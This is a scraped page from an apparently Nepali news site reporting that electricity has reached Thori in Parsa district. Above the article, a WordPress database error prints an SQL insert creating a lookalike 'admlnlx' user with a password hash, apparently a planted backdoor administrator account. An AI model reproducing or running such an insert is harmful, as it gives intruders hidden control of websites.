WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bjv6ev5tZ/FQpDSOImT8QOvQcRMFrS1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 10:47:57', '', 'admlnlx', 'admlnlx')
पर्सा,मंसिर २४-
पर्साको दुर्गमु गाउँ मानिने ठोरीमा विजुली पुगेको छ।नेपाल विद्युत प्राधिकरणको पोखरिया सवस्टेशनले ट्रान्सफर्मर जडान गरेर विजुली परीक्षण समेत गरिसकेको छ। इलाका प्रहरी कार्यालयमा विजुलीको परीक्षण गरिएको थियो।
ट्रान्सफर्मरमा निर्मलबस्ती रामनगरबाट करेन्ट प्रवाह गराई विजुली बालिएको हो । ठोरी क्षेत्रभरी ६ वटा ट्रान्सफर्मर जडान गरिएको ठेकेदार भागवत दासले बताए ।
उनका अनुसार बाँकी पाँच वटा ट्रान्सफर्मरमा बिहीवारदेखि क्रमशः परीक्षण गरिनेछ। ट्रान्सफर्मर परीक्षण गरेपछि मङ्सिर भित्र उपभोक्ताको घरघरमा बिजुली पुग्ने जिल्ला विकास समिति, पर्साले जनाएको छ ।
बत्ती बलेपछि ठोरीका सर्वसाधारण हर्षित भएका छन् । इलाका प्रहरी कार्यालय परीसरमा जडान गरिएको ट्रान्सफर्मरमा बत्ती बल्दैछ भन्ने खबर पाएपछि स्थानीयको भीड लागेको थियो ।
विजुली पुगेपछि ठोरीमा रहेका १ हजार ३ सय ८९ घरधुरी लाभान्वित हुनेछन्।औपचारिक रुपमा विजुलीको उद्घाटन भने उर्जामन्त्री जनार्दन शर्माले गर्ने कार्यक्रम छ।भारतीय दूतावासको आर्थिक सहयोगमा हेटौंडाको जनमुखी कन्स्ट्रक्सनले आर्थिक वर्ष २०६३÷०६४ मा विद्युतीकरण परियोजना शुरु गरेको थियो।